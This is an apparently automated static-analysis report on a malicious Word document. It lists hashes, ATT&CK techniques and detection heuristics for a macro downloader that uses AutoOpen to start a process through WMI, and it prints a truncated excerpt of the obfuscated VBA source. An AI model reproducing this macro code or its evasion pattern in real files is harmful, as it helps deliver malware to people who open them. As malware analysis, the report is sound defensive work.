Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5cb8575c41a90132…

MALICIOUS

Office (OLE)

198.1 KB Created: 2019-04-30 09:31:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: fadd359148ce096d477de03af1c86670 SHA-1: 04e6f7fa7671a4ec974cd88669ab697bc28c095b SHA-256: 5cb8575c41a90132e26b37da86d4c36b7d7e9dc7167f3297005cad53c9932f5b
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

This Office document contains VBA macros with an autoopen subroutine. The macro utilizes GetObject and CreateObject to launch a process via WMI, specifically targeting Win32_Process. This indicates an attempt to download and execute a second-stage payload. The obfuscation technique of splitting keywords like 'winmgmts' is also present.

Heuristics 9

  • ClamAV: Doc.Downloader.00536d-6958656-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6958656-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39188 bytes
SHA-256: f2fdb18505984762056130554818558afade6dbf76d74fe582650634eb089260
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sCUxAAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lG4cwD"
Attribute VB_Base = "0{EBC644D4-E386-413C-908E-8481485EB75E}{EC580E15-8A81-4B78-88AB-84AAC279D031}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "TUUBC1A"
Attribute VB_Base = "0{3167F5AA-0D09-48E8-85A9-2ACA6C93CB70}{EEF0353F-884E-4D91-BC63-4F5627EB9542}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MxwAUDA"
Sub autoopen()
   If HU41ADUZ = L4AZXAUU Then
ElseIf tCUAcc4C = RAAUUAQ Then
            PBQUB_UZ = Hex(JADBBxwx + CSng(C_AGUA / Tan(970737797 + 556162569)))
ElseIf nCAoxXDQ = dZADAAAU Then
            ZAAcAAAk = Atn(679437309) + Int(131615049)
ElseIf zAkwUXQA = tBABAAA Then
            ODo1AZ = 448721800 + Atn(136639462)
End If
   If GXAAADA_ = kAcAAQ Then
ElseIf hXAxZAA = iC1cDU Then
            DAQBAQ = Hex(XCZA1Q + CSng(HxAQDU_ / Tan(462506023 + 246436896)))
ElseIf a4w44o4 = bAZA4oAZ Then
            pkAABDG = Atn(326522074) + Int(129585114)
ElseIf D4AXAQw = NUA4oDZ4 Then
            hcA4XA = 883858803 + Atn(693918168)
End If
jQAAxZ_
   If FQBXU_U = UZUo1BAA Then
ElseIf bAoQXAB = JAAx1G Then
            rCACwUBA = Hex(MD1xBBA + CSng(KAUDBAD / Tan(289954362 + 68963466)))
ElseIf UXoAAUA = iADcA4 Then
            IDwQAX = Atn(192828462) + Int(178883383)
ElseIf I4kDQBU = XGwXAQ Then
            HUUAcBDk = 722919832 + Atn(361484891)
End If
   If EAGG1A1 = iwxAD_ Then
ElseIf BQBQQD = vUAQAA_A Then
            VDQ4kA = Hex(jABoAc + CSng(JQwUBB_ / Tan(747333040 + 376130019)))
ElseIf PABA4AA = iAGUUDU Then
            CcADAB = Atn(691073589) + Int(205421895)
ElseIf t4AwQBD = twkUAwAA Then
            OXAAGA4 = 820586426 + Atn(212776036)
End If
End Sub
Function KwDCUk(JUAAAAAA)
   If YAGAXU = woAAAD Then
ElseIf PBDBXkA = fAZ1A1k Then
            NwBwACZC = Hex(oGXoAAk + CSng(rDDUDBB / Tan(648705149 + 949573156)))
ElseIf iAC1BAQD = DAZDQAA Then
            zADQCAA = Atn(495369129) + Int(231476101)
ElseIf PBDAQB = CAQxXCQA Then
            qxAQDoQ = 217618812 + Atn(159211596)
End If
   If X41CAAc = jAAUZx Then
ElseIf rQAUAQ = OQDCUwxo Then
            KcGB4A = Hex(PDxAQ1A + CSng(TocxD_ / Tan(169904674 + 341042040)))
ElseIf UZAAQQ1 = iAADQxw_ Then
            zAADXA = Atn(9222619) + Int(949679386)
ElseIf aQwDQw = P_1wZcAQ Then
            JxBxUkwQ = 361956331 + Atn(147205240)
End If
Set KwDCUk = CVar(JUAAAAAA)
   If DDAZAcBB = LxcxxAQ Then
ElseIf HoAx_Qxc = J_xAA_4Z Then
            MU4XAQCw = Hex(zC_Q4o + CSng(ocAcoA / Tan(555200342 + 907486524)))
ElseIf rQUA4A = OAUCBAAZ Then
            A_k11B = Atn(710272978) + Int(195646544)
ElseIf aUAUAA = pXDAAB Then
            RBU4ADA = 332618772 + Atn(894355665)
End If
   If PAADAC = cA1Q1A_ Then
ElseIf ZAGAxAAB = vGxQwA Then
            Vw_GAQZ = Hex(fGQAAoAA + CSng(z1AAQw / Tan(863611492 + 19546555)))
ElseIf JDxGAAD = JAADAGAA Then
            pQU44A = Atn(334802405) + Int(489768733)
ElseIf XoQQkUQG = jZcxAAAA Then
            SDABAQ__ = 418002456 + Atn(23872221)
End If
   If HQCBXko1 = VAU4Xx Then
ElseIf GUUQAB = LU_AAw1 Then
            sU1CkBA = Hex(UBAxAA1 + CSng(SxDADwB / Tan(903309971 + 473274309)))
ElseIf FXCxxAA = zoAcAX Then
            K4AA1ACD = Atn(210664378) + Int(814378656)
ElseIf TwDc__ = ux_AB4Z Then
            ToXAoU = 876606067 + Atn(79912719)
End If
End Function

Attribute VB_Name = "MBAU__A"
Function jQAAxZ_()
On Error Resume Next
   If CAABAAoX = jBXGABBZ Then
ElseIf AQ4AGAcD = ZXZAAx Then
            vZ4AG
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.